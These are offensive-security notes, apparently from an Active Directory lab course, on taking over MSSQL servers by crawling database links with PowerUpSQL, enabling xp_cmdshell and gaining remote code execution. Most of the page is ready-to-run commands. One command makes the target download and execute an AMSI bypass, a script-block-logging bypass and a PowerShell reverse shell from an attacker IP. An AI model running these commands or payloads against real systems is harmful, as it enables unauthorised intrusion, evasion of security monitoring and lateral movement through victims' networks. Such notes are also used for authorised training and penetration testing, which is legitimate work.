Skip to content

MSSQL Servers

Concepts

  • MSSQL Servers: Microsoft SQL Server instances that may be exposed within an Active Directory environment, often misconfigured with excessive privileges or reachable via domain accounts.

  • Database Links: Trusted connections between SQL Server instances that allow query execution on remote servers. These links may run under privileged accounts (e.g., sa), enabling lateral movement and cross-domain pivoting through SQL chains.

Workflow

1. Discover accessible SQL instances in the domain (Get-SQLInstanceDomain)
        ↓
2. Check current privileges on the instance (public? sysadmin?)
        ↓
3. Enumerate Database Links from the current instance (Get-SQLServerLink)
        ↓
4. Crawl the full link chain looking for sysadmin privileges at any hop
        ↓
5. Enable xp_cmdshell on the sysadmin-level server to allow OS command execution
        ↓
6. RCE β†’ reverse shell β†’ lateral movement / cross-domain pivot

Enumeration

# Import PowerUpSQL module into current session
. .\PowerUpSQL.ps1

# Discover all SQL Server instances registered in the domain via SPN enumeration
Get-SQLInstanceDomain

# Test connectivity and authentication against discovered instances (threaded for speed)
Get-SQLConnectionTestThreaded

# List all Database Links configured on a specific instance
# Links may use different credentials and privilege levels than your current user
Get-SQLServerLink -Instance <instance> -Verbose

# Automatically crawl all chained linked servers recursively
# Shows the full path, login used at each hop, and whether that login has sysadmin
Get-SQLServerLinkCrawl -Instance <instance> -Verbose

# Retrieve detailed SQL Server info (version, hostname, service account, etc.)
Get-SQLInstanceDomain | Get-SQLServerInfo

Explotation (RCE - Reverse Shell)

# Send a ping from the target SQL server back to your machine
Get-SQLServerLinkCrawl -Instance dcorp-mssql `
    -Query 'exec master..xp_cmdshell ''ping 172.16.100.44 -n 1''' `
    -QueryTarget eu-sql25 -Verbose

# Run whoami across the full chain β€” only sysadmin nodes will return output
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local `
    -Query "exec master..xp_cmdshell 'whoami'" -Verbose

# Alternatively, dump environment variables to confirm user and hostname
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local `
    -Query "exec master..xp_cmdshell 'set username'"

Create a copy of Invoke-PowerShellTcpEx and write at the end 

Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.x -Port 443


Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.x/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.x/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sqlx

Enable xp_cmdshell (if disabled on the target)

-- Step 1: Enable 'show advanced options' to expose sp_configure settings
EXECUTE('sp_configure ''show advanced options'', 1; RECONFIGURE') AT [remote_server]

-- Step 2: Enable xp_cmdshell to allow OS command execution from SQL
EXECUTE('sp_configure ''xp_cmdshell'', 1; RECONFIGURE') AT [remote_server]